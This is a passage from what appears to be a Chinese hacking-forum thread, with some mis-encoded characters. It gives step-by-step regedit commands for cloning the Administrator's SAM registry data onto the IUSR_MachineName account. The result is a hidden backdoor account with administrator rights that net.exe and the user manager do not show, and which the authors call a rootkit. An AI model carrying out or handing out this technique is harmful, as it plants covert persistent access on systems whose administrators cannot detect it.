我想,再高明的管理員也看不到任何的異狀了...而且,隨便管理員改成什么密碼,我照樣可以用IUSR_MachineName,密碼為Sometips登陸...(沒有哪位大俠級的管理員喜歡經(jīng)常修改IUSR_MachineName為其他的名字吧)
^_^,這算不算RootKit...
附:
1、感謝叮叮付出需要reinstall OS的代價...
2、任何用以上方法進行試驗所導(dǎo)致的系統(tǒng)無法使用均與偶無關(guān),偶均不提供技術(shù)支持...
-----------------------------------------------------------------------------
叮叮 的補充完善
很多人提到使用了管理工具的用戶管理后,能夠發(fā)現(xiàn)IUSR_MachineName被提升了權(quán)限。
現(xiàn)給出解決辦法。
方法同上,不過這次修改內(nèi)容多一些。即
這次要導(dǎo)出兩個key內(nèi)容:
一個是adam提到的
regedit /e adam.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
然后另外一個是你需要修改那個賬號的值
regedit /e iusr.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003E9
然后按照adam提到的修改adam.reg
“將adam.reg文件的第三行--[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4]最后的'1F4'修改為IUSR_MachineName的SID”
現(xiàn)在,你還要從iusr.reg文件中復(fù)制一下內(nèi)容
就是將iusr.reg文件中“'V'=hex:0”開始一直到iusr.reg文件結(jié)束部分復(fù)制下來
然后替換掉adam.reg中同樣位置的部分
最后使用
regedit /s adam.reg
導(dǎo)入該Reg文件
呵呵,別忘了給這個IUSR_MachineName改密碼哦。
hehe,ok,大功告成。
現(xiàn)在IUSR_MachineName賬號擁有了管理員的權(quán)限,但是你使用net.exe和
管理工具中的用戶管理都將看不到任何痕跡,即使你去察看所屬于的組和用戶。
都和修改前沒有任何區(qū)別。
好了,補充結(jié)束。